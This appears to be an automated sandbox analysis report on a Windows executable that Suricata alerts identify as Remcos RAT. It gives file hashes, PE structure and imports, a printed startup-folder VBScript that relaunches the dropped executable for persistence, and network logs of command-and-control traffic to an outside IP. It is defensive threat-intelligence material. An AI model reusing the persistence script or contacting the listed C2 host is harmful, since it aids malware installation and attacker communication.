                        Download File
                        Process:C:\Users\user\Desktop\Rgh99876k7e.exe
                        File Type:ASCII text, with very long lines (65536), with no line terminators
                        Category:dropped
                        Size (bytes):143370
                        Entropy (8bit):2.663212297966778
                        Encrypted:false
                        SSDEEP:384:qrYq11YnBr4syynyQndWYColVesmlzXYxb3WUgQRm0LYQ:n
                        MD5:FC0250799241323E9F3A53F51F7DF0F1
                        SHA1:F0D60DBF33047494014302B4EE8B438CC0380943
                        SHA-256:0469EC50B7420320B46FB0A05C5D875DE1CA110B2E18FBCB37860E2A6CD31982
                        SHA-512:CCACACED5EB79A9920299599B34984788C2288BF07CE1A423668C5B4E56F4348CF7A6A29231A658FCE07A40719897EE1DDE428D4539A8007F6028B243F718661
                        Malicious:false
                        Preview:0650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504c650426504c6504d65045650456504e6504b65048650406504c650436504365042650406504b6504e6504c6504f65045650446504b65048650406504065040650406504

                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbs

                        Download File
                        Process:C:\Users\user\AppData\Local\Cocles\antholite.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):274
                        Entropy (8bit):3.3744078175813597
                        Encrypted:false
                        SSDEEP:6:DMM8lfm3OOQdUfclo5ZsUEZ+lX1mlKUHsyBnriIM8lfQVn:DsO+vNlzQ1wsCmA2n
                        MD5:D5D40F3ED3E849D3A12AF5579AA1147A
                        SHA1:E7818A25ADFDE6C86A23113B34889C9EA6F1BF0A
                        SHA-256:C1130B8288DEDF948D98566CAEB4E900EEB4EAF6D48330FC9E475FCA0C5E1F6E
                        SHA-512:95D851D52B4581DC1A498D3FB657E4AD88DF2E8F208E2DAA243FB9BD26EECE837FCEDDBDAAE217EF39F48F182793CBA09A8633E44E92CAAEC3DA15DA4015552B
                        Malicious:true
                        Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.C.o.c.l.e.s.\.a.n.t.h.o.l.i.t.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.202131903261275
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:Rgh99876k7e.exe
                        File size:1'521'152 bytes
                        MD5:bd6420aaf066a5b4533598417866bc67
                        SHA1:cf56376da61f4f34034fa4cc525e708052a5ecd3
                        SHA256:b8022e8002a8e01a6364fdcc6d53275b6edf3d196e36f0b4c9645de2570cfd48
                        SHA512:d9b394fc25949d552b64061810cd4452d24ee473c5755bada25b1db5ad35652a57b545c53c5e1dea88feac376b86e838a6b87886e9ad50e1f582eb2b985cda78
                        SSDEEP:24576:zqDEvCTbMWu7rQYlBQcBiT6rprG8auS2rwF3q65FE8wvsO5BaH3:zTvC/MTQYxsWR7auSY65G8wDKH
                        TLSH:7065BF5133A5C353FEA699720F8AE6306AF8756D44D3660F12F80B7DB7F02A0056D6E2
                        File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                        File Icon

                        Icon Hash:6194944323030383

                        Static PE Info

                        General

                        Entrypoint:0x420577
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66D54032 [Mon Sep 2 04:33:54 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:948cc502fe9226992dce9417f952fce3

                        Entrypoint Preview

                        Instruction
                        call 00007F0E049CA6B3h
                        jmp 00007F0E049C9FBFh
                        push ebp
                        mov ebp, esp
                        push esi
                        push dword ptr [ebp+08h]
                        mov esi, ecx
                        call 00007F0E049CA19Dh
                        mov dword ptr [esi], 0049FDF0h
                        mov eax, esi
                        pop esi
                        pop ebp
                        retn 0004h
                        and dword ptr [ecx+04h], 00000000h
                        mov eax, ecx
                        and dword ptr [ecx+08h], 00000000h
                        mov dword ptr [ecx+04h], 0049FDF8h
                        mov dword ptr [ecx], 0049FDF0h
                        ret
                        push ebp
                        mov ebp, esp
                        push esi
                        push dword ptr [ebp+08h]
                        mov esi, ecx
                        call 00007F0E049CA16Ah
                        mov dword ptr [esi], 0049FE0Ch
                        mov eax, esi
                        pop esi
                        pop ebp
                        retn 0004h
                        and dword ptr [ecx+04h], 00000000h
                        mov eax, ecx
                        and dword ptr [ecx+08h], 00000000h
                        mov dword ptr [ecx+04h], 0049FE14h
                        mov dword ptr [ecx], 0049FE0Ch
                        ret
                        push ebp
                        mov ebp, esp
                        push esi
                        mov esi, ecx
                        lea eax, dword ptr [esi+04h]
                        mov dword ptr [esi], 0049FDD0h
                        and dword ptr [eax], 00000000h
                        and dword ptr [eax+04h], 00000000h
                        push eax
                        mov eax, dword ptr [ebp+08h]
                        add eax, 04h
                        push eax
                        call 00007F0E049CCD5Dh
                        pop ecx
                        pop ecx
                        mov eax, esi
                        pop esi
                        pop ebp
                        retn 0004h
                        lea eax, dword ptr [ecx+04h]
                        mov dword ptr [ecx], 0049FDD0h
                        push eax
                        call 00007F0E049CCDA8h
                        pop ecx
                        ret
                        push ebp
                        mov ebp, esp
                        push esi
                        mov esi, ecx
                        lea eax, dword ptr [esi+04h]
                        mov dword ptr [esi], 0049FDD0h
                        push eax
                        call 00007F0E049CCD91h
                        test byte ptr [ebp+08h], 00000001h
                        pop ecx

                        Rich Headers

                        Programming Language:
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x9ca3c.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1710000x7594.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0xd40000x9ca3c0x9cc0036bcc766fb62eb1bdfdb39fbe3d54d4eFalse0.7549451131379585data7.600735982202153IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0x1710000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_ICON0xd45d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                        RT_ICON0xd47000x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                        RT_ICON0xd48280x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                        RT_ICON0xd49500x1826PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9217081850533808
                        RT_ICON0xd61780x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishGreat Britain0.04561989826097244
                        RT_ICON0xe69a00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishGreat Britain0.08419171746899307
                        RT_ICON0xefe480x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishGreat Britain0.10757855822550831
                        RT_ICON0xf52d00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishGreat Britain0.09559518186112423
                        RT_ICON0xf94f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.15549792531120332
                        RT_ICON0xfbaa00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.1824577861163227
                        RT_ICON0xfcb480x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishGreat Britain0.2934426229508197
                        RT_ICON0xfd4d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.3421985815602837
                        RT_MENU0xfd9380x50dataEnglishGreat Britain0.9
                        RT_STRING0xfd9880x594dataEnglishGreat Britain0.3333333333333333
                        RT_STRING0xfdf1c0x68adataEnglishGreat Britain0.2735961768219833
                        RT_STRING0xfe5a80x490dataEnglishGreat Britain0.3715753424657534
                        RT_STRING0xfea380x5fcdataEnglishGreat Britain0.3087467362924282
                        RT_STRING0xff0340x65cdataEnglishGreat Britain0.34336609336609336
                        RT_STRING0xff6900x466dataEnglishGreat Britain0.3605683836589698
                        RT_STRING0xffaf80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                        RT_RCDATA0xffc500x70860data1.0003276227174893
                        RT_GROUP_ICON0x1704b00x84dataEnglishGreat Britain0.7272727272727273
                        RT_GROUP_ICON0x1705340x14dataEnglishGreat Britain1.25
                        RT_GROUP_ICON0x1705480x14dataEnglishGreat Britain1.15
                        RT_GROUP_ICON0x17055c0x14dataEnglishGreat Britain1.25
                        RT_VERSION0x1705700xdcdataEnglishGreat Britain0.6181818181818182
                        RT_MANIFEST0x17064c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                        Imports

                        DLLImport
                        WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                        VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                        COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                        MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                        WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                        PSAPI.DLLGetProcessMemoryInfo
                        IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                        USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                        UxTheme.dllIsThemeActive
                        KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                        USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                        GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                        COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                        ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                        SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                        ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                        OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                        Possible Origin

                        Language of compilation systemCountry where language is spokenMap
                        EnglishGreat Britain

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                        2024-09-03T15:24:07.703909+0200TCP2032777ET MALWARE Remcos 3.x Unencrypted Server Response1878749704192.210.150.26192.168.2.5
                        2024-09-03T15:24:08.739478+0200TCP2803304ETPRO MALWARE Common Downloader Header Pattern HCa34970680192.168.2.5178.237.33.50
                        2024-09-03T15:24:06.612948+0200TCP2032776ET MALWARE Remcos 3.x Unencrypted Checkin1497048787192.168.2.5192.210.150.26
                        2024-09-03T15:26:14.817228+0200TCP2032777ET MALWARE Remcos 3.x Unencrypted Server Response1878749704192.210.150.26192.168.2.5

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Sep 3, 2024 15:24:06.607283115 CEST497048787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:06.612308979 CEST878749704192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:06.612508059 CEST497048787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:06.612947941 CEST497048787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:06.617821932 CEST878749704192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:07.703908920 CEST878749704192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:07.705487013 CEST497048787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:07.710403919 CEST878749704192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:07.758460999 CEST878749704192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:07.760829926 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:07.765784025 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:07.765923023 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:07.765923977 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:07.770823002 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:07.807863951 CEST497048787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:07.816124916 CEST4970680192.168.2.5178.237.33.50
                        Sep 3, 2024 15:24:07.821418047 CEST8049706178.237.33.50192.168.2.5
                        Sep 3, 2024 15:24:07.821496964 CEST4970680192.168.2.5178.237.33.50
                        Sep 3, 2024 15:24:07.821610928 CEST4970680192.168.2.5178.237.33.50
                        Sep 3, 2024 15:24:07.827143908 CEST8049706178.237.33.50192.168.2.5
                        Sep 3, 2024 15:24:08.238290071 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.238317966 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.238348961 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.238408089 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.238421917 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.238431931 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:08.238475084 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:08.238574028 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.238588095 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.238600969 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.238634109 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:08.238656998 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.238667011 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:08.238667965 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.238744974 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:08.243295908 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.243415117 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.243427038 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.243439913 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.243474007 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:08.243495941 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:08.243578911 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.292259932 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:08.324939013 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.324976921 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.324990988 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.325041056 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.325041056 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:08.325053930 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.325076103 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.325090885 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:08.325140953 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:08.325340033 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.325383902 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.325434923 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:08.325519085 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.325530052 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.325546026 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.325583935 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:08.325613022 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.325627089 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.325639009 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.325665951 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:08.325700998 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:08.326400995 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.326442957 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.326456070 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.326498032 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:08.326643944 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.326654911 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.326662064 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.326740980 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:08.327358961 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.327383041 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.327400923 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.327411890 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:08.327426910 CEST878749705192.210.150.26192.168.2.5
